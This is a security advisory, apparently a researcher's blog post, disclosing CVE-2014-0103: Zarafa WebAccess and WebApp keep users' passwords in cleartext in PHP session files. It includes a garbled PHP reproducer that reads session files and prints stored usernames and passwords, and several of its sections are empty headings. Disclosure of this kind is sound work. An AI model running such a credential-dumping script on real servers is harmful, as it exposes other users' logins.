CVE-2014-0103: Cleartext session password in Zarafa

Am 27. Februar 2014 habe ich entdeckt, dass beim Zarafa WebAccess die in der PHP-Session auf Serverseite gespeicherten Benutzernamen und Passwörter der angemeldeten Zarafa-Benutzer unverschlüsselt abgelegt werden und damit von einem lokalen Angreifer ausgelesen werden können. Die Zarafa WebApp als Nachfolger des Zarafa WebAccesses ist ebenfalls betroffen. Nachfolgend das Security Advisory in englischer Sprache:


Zarafa is a leading European provider of open source groupware and collaboration software. The core product is the Zarafa Collaboration Platform (ZCP), an European open and compatible groupware platform that can be used as a drop-in Microsoft Exchange replacement for e-mail, calendaring, collaboration and tasks (origin: Zarafa company profile).


For accessing e-mails, calendars, contacts and tasks of the groupware platform via the web, Zarafa provides the Zarafa WebAccess and the Zarafa WebApp as clients/frontends. The Zarafa WebApp is a fork and the successor of the Zarafa WebAccess. Both web clients/frontends store the username and password of authenticated Zarafa users in cleartext in on-disk PHP session files. Thus an local attacker could access these on-disk PHP session files read-only.

CVSS v2 metrics


There is no exploitation which would allow unauthenticated remote attackers to gain root access. However Zarafa supports different user backends, such as LDAP. If an attacker gains user credentials originating from an LDAP more wide access might be possible. Additionally the attacker is in any case and independent of the user backend able to use the gained user credentials to authenticate against Zarafa.

If the Zarafa WebAccess or the Zarafa WebApp are run on a shared hosting site (multiple web sites on the same server) and an administrator of another virtual host, with the ability to upload arbitrary scripts to the server, it could be used to obtain the Zarafa user credentials due to both sites being run by the same Apache user and the PHP session files being owned by the same.

In a non-shared hosting environment or one using something like suEXEC, where the PHP session files are owned by individual users on a per-site basis, this would not be an issue. In that case, only a local user able to read these files (either as root or as the user running the Apache web server) would be able to view the credentials.


Even the following commands and the PHP script could be used to actively exploit and abuse this flaw they are only made public to analyze if the system in question is vulnerable or not.

robert@tux:~ > id
uid=1000(robert) gid=100(users) groups=100(users) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
robert@tux:~ >

This PHP script opens the session save path, walks through each session file, decodes the session data and prints the username and password.

robert@tux:~ > cat reproducer.php
$handle opendir($directory))
$file readdir($handle)) !== FALSE)
is_file($directory "/" $file))
$content file_get_contents($directory "/" $file)) !== FALSE)
$_SESSION['username']) && isset($_SESSION['password']))
printf("'%s' => '%s'%s"$_SESSION['username'], $_SESSION['password'],
PHP_SAPI == "cli") ? PHP_EOL "<br />");
robert@tux:~ >

A system with Zarafa WebAccess or Zarafa WebApp is affected if the following command being run as non-privileged system user after a login to either Zarafa WebAccess or Zarafa WebApp returns the credentials of the logged in Zarafa user.

robert@tux:~ > php reproducer.php
'tux' => 'Fish!'
robert@tux:~ >


Given this issue is a design flaw the only workarounds are to run Zarafa WebAccess and Zarafa WebApp in a non-shared hosting environment or one using something like suEXEC, where the PHP session files are owned by individual users on a per-site basis.


As there are fixed releases of the Zarafa WebAccess and the Zarafa WebApp available, an update is highly recommented over any workaround.

The flaw is technically solved using PHP's OpenSSL support, namely openssl_encrypt() and openssl_decrypt(). However this requires PHP >= 5.3.0 while some Linux distributions like Red Hat Enterprise Linux 5 or SuSE Linux Enterprise Server 10 still ship PHP < 5.3 by default. On such systems Zarafa remains affected by this flaw, except if a patch using PHP's Mcrypt support, namely mcrypt_encrypt and mcrypt_decrypt, is applied.

Affected versions

Fixed versions

CVE information

The MITRE Corporation Common Vulnerabilities and Exposures (CVE) number CVE-2014-0103 was assigned on February 28, 2014. Currently, the following other identifications are known for this issue:

Disclosure timeline


This vulnerability was discovered, analyzed and reported by Robert Scheck.

Robert Scheck would like to thank Vincent Danen of the Red Hat Security Response Team for his time and support.

Legal notices

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an as is condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.